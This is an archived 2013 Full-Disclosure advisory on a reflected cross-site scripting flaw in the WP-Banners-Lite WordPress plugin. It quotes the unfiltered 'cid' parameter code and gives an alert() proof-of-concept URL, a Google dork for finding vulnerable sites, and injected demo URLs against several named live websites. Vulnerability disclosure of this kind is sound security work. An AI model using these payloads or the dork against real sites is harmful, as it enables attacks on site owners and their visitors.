lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Mon, 25 Mar 2013 08:53:28 -0300
From: "Fernando A. Lagos B." <fernando@...ial.org>
To: full-disclosure@...ts.grok.org.uk
Subject: XSS vulnerability on WP-Banners-Lite (wordpress
	plugin)

I. Background
--------------
[-] Affected plugin: WP Banners Lite
[-] Plugin Description: The plugin easily allows you to manage ad
banners on your site.
[-] Plugin URL: http://wordpress.org/extend/plugins/wp-banners-lite/
[-] Tested Version: 1.29, 1.31, 1.40
[-] Reported: YES - but no answer
[-] Report Date: 03/12/13
[-] Published:
http://blog.zerial.org/seguridad/vulnerabilidad-en-plugin-para-wordpress-afecta-a-mas-de-200-sitios/


II. Details
------------
Cross-Site Scripting flaw discovered on WP-Banners-Lite.

The problem is wpbanners_show.php, at lines 8 and 9, the developer
doesn't filter correctly the variable called "cid" obtained from URL
(Method GET). He obtains "cid"  from URL, do a str_replace to remove '
and then he print it.

[+] File: wpbanners_show.php
[-] Line 8:   $cid = $_GET["cid"];
[-] Line 9:  $cid = str_replace("'", "", $cid);
[-] Line 51:  echo 'jQuery(\'#'.$cid.'\').replaceWith(\''.$banner.'\')';

Then, we can inject our own html or javascript code.

III. Exploit
-------------
The vulnerability can be exploited by injecting html or javascript
code as following:

http://localhost/wordpress/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_<script>alert(/XSS
Proof-of-Concept/)</script>

IV. URL around the world
-------------------------
[-] Google Dork: inurl:wp-banners-lite inurl:wpbanners_show filetype:php

Demo:

http://www.thexfactornews.co.uk/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=6&cid=a_8b2dfbe0c1d43f9537dae01e96458ff1%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

http://www.forexlistings.net/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_dc09c97fd73d7a324bdbfe7c79525f64%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

http://www.the-news.co/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_cf9a242b70f45317ffd281241fa66502%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

http://web.casinodesalamanca.es/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=2&cid=a_505259756244493872b7709a8a01b536%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

https://www.ironbank.com/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=4&cid=a_13b919438259814cd5be8cb45877d577%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

http://www.defensa.gob.ec/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=3&cid=a_94ef7214c4a90790186e255304f8fd1f%3Cem%3Ea%3Cscript%3Ealert%28/XSS/%29%3C/script%3E


cheers,
-- 
Fernando A. Lagos Berardi
Seguridad Informatica
GNU/Linux User #382319
Blog: http://blog.zerial.org
Jabber: zerial@...beres.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ